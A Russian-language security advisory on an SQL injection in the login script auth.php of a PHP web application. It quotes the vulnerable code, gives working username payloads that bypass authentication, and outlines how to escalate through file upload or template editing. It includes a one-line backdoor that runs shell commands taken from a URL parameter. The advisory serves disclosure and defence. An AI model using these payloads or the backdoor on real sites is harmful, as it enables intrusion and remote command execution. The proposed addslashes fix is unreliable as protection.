Уязвимость:
Уязвимый скрипт: auth.php
Уязвимый код:
else if(isset($_POST['user']) && isset($_POST['password']))
{
$in_user = $_POST['user']; // <-- not filtered
$in_password = $_POST['password'];
}
$result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = '' . $in_user . '' AND password = password('' . $in_password . '')');
$dbQueries++;
if(mysql_numrows($result) != 0)
{
$auth = true;
$_SESSION['user'] = $in_user;
$_SESSION['password'] = $in_password;
}
В случае, если параметр magic_quotes_gpc=0, атакующий может внедрить SQL инъекцию в переменную $_POST['user'].
Пример эксплуатации:
В поле «Username» , указываем «whatever' or '1'='1'/*», и
«whatever» в поле «Password»(без двойных кавычек).
Или просто используем — «admin'/*» в качестве имени пользователя (где «admin» — реальный логин для администратора).
Возможный сценарий атаки:
[1] Логинимся в admin panel, используя SQL инъекцию
[2] Загружаем PHP файл через «Upload Images» функцию (index.php?action=images) и получаем php shell или
редактируем шаблон (index.php?action=modtemp) и вставляем туда код для потайного хода (к примеру: if($_GET["hack"]) { system(«$_GET[»hack"]); } )
Устранение уязвимости:
Замените в коде auth.php, строчки:
$in_user = $_POST['user'];
на
if (!get_magic_quotes_gpc()) {$in_user=addslashes($_POST['user']); $in_password = addslashes($_POST['password']);}
else {$in_user = $_POST['user']; $in_password = $_POST['password'];}
